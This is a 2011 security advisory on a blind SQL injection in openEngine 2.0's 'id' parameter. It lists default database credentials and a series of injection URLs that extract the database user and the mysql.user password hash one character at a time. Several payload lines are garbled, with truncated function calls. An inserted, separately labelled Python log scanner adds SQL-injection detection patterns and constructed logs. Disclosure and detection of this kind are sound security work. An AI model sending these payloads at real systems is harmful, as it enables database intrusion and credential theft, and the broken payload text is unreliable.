SSCHADV2011-019 - openEngine 2.0 'id' Blind SQL Injection vulnerability
Advisory: openEngine 2.0 'id' Blind SQL Injection vulnerability
Advisory ID: SSCHADV2011-019
Author: Stefan Schurtz
Affected Software: Successfully tested on openEngine 2.0 100226
Vendor URL:
Vendor Status: informed
CVE-ID: -
======================
Vulnerability Description:
======================
openEngine 2.0 is prone to a Blind SQL Injection
==============
Technical Details:
==============
Database information
User: easy
Password: easy (Hash: *E8F5FAE73EBB89AE362C59646600DDCD35EAD7E0)
Blind SQL Injection
http://<target>/openengine/cms/website.php?id=/de/sendpage.htm') AND 1=1 AND ('a'='a&key= <- error
http://<target>/openengine/cms/website.php?id=/de/sendpage.htm') AND 1=0 AND ('a'='a&key= <- no error
User-Guessing
http://<target>/openengine/cms/website.php?id=/de/sendpage.htm') AND ORD,CHAR)) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),2,1)) = 101 AND ('a'='a <- error (e)
http://<target>/openengine/cms/website.php?id=/de/sendpage.htm') AND ORD,CHAR)) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),3,1)) = 97 AND ('a'='a <- error (a)
http://<target>/openengine/cms/website.php?id=/de/sendpage.htm') AND ORD,CHAR)) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),4,1)) = 115 AND ('a'='a <- error (s)
http://<target>/openengine/cms/website.php?id=/de/sendpage.htm') AND ORD,CHAR)) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),5,1)) = 121 AND ('a'='a <- error (y)
Password(Hash)-Guessing
http://<target>/openengine/cms/website.php?id=/de/sendpage.htm') AND ORD,CHAR)) FROM mysql.user WHERE user=CHAR LIMIT 0,1),1,1)) = 42 AND ('a'='a <- error (*)
http://<target>/openengine/cms/website.php?id=/de/sendpage.htm') AND ORD,CHAR)) FROM mysql.user WHERE user=CHAR LIMIT 0,1),2,1)) = 69 AND ('a'='a <- error (E)
http://<target>/openengine/cms/website.php?id=/de/sendpage.htm') AND ORD,CHAR)) FROM mysql.user WHERE user=CHAR LIMIT 0,1),3,1)) = 56 AND ('a'='a <- error (8)
… and so on
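A defender-side check for the request patterns listed above, as an added example that is not part of the original advisory: it scans web access logs for website.php requests whose id value is not a plain path and reports clients that repeat one probe shape. The log format, the IP addresses, the SAFE_ID pattern and the threshold are assumptions, and the sample log lines are constructed.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, quote, urlsplit

# Assumption: legitimate id values are plain site paths such as /de/sendpage.htm.
SAFE_ID = re.compile(r"^/[A-Za-z0-9_./-]*$")
# Markers derived from the request lines shown in the advisory.
MARKERS = {
    "quote_break": re.compile(r"['\u2018\u2019]\s*\)\s*AND\b", re.I),
    "char_compare": re.compile(r"\bORD\b.*=\s*\d+", re.I),
    "system_table": re.compile(r"information_schema\.|mysql\.user", re.I),
}
LOG_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP')

def inspect_id(value):
    """Return the marker names found in one decoded id value ([] if it looks clean)."""
    if SAFE_ID.match(value):
        return []
    return sorted(n for n, rx in MARKERS.items() if rx.search(value)) or ["unexpected_chars"]

def scan(lines, threshold=3):
    """Return (findings, clients that repeat one probe shape >= threshold times)."""
    findings, shapes = [], Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if not m or "website.php" not in m.group(2):
            continue
        ip, target = m.groups()
        for value in parse_qs(urlsplit(target).query).get("id", []):
            hits = inspect_id(value)
            if hits:
                findings.append((ip, hits))
                # Digits become N, so probes differing only in offset or code collapse.
                shapes[(ip, re.sub(r"\d+", "N", value))] += 1
    return findings, sorted({ip for (ip, _), n in shapes.items() if n >= threshold})

def _line(ip, id_value):
    # Build one constructed access-log line (combined log format).
    path = "/openengine/cms/website.php?id=" + quote(id_value, safe="/") + "&key="
    return f'{ip} - - [26/Sep/2011:10:00:00 +0000] "GET {path} HTTP/1.1" 200 512'

# Constructed sample log: id values follow the advisory's request lines as printed.
PROBE = "/de/sendpage.htm') AND ORD,CHAR)) FROM mysql.user WHERE user=CHAR LIMIT 0,1),%d,1)) = %d AND ('a'='a"
SAMPLE_LOG = [
    _line("198.51.100.7", "/de/sendpage.htm"),
    _line("192.0.2.10", "/de/sendpage.htm') AND 1=1 AND ('a'='a"),
    _line("192.0.2.10", "/de/sendpage.htm') AND 1=0 AND ('a'='a"),
] + [_line("192.0.2.10", PROBE % pair) for pair in [(1, 42), (2, 69), (3, 56)]]
```

Calling scan(SAMPLE_LOG) returns the flagged requests with their markers and the list of clients whose probes differ only in numbers, which is the signature of character-by-character guessing.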
=====
Solution:
=====
-
================
Disclosure Timeline:
================
25-Sep-2011 – informed developers
26-Sep-2011 – release date of this security advisory
27-Sep-2011 – post on BugTraq
====
Credits:
====
Vulnerability found and advisory written by Stefan Schurtz.
=======
References:
=======
http://www.openengine.de/